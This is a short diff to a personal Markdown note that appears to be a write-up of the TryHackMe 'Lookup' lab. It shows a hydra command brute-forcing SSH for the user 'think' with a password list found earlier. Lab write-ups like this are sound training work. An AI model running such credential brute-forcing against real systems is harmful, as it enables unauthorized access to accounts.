KanielPinto/notes/Cybersecurity/TryHackMe/Lookup.md

 We obtain a list of passwords used by the think user.

-We can use these to brute-force SSH into said user :
+We can use these to brute-force SSH into said user with [[hydra]] :

 ```bash
 ❯ hydra -l think -P ./jose_passwords lookup.thm ssh -t 4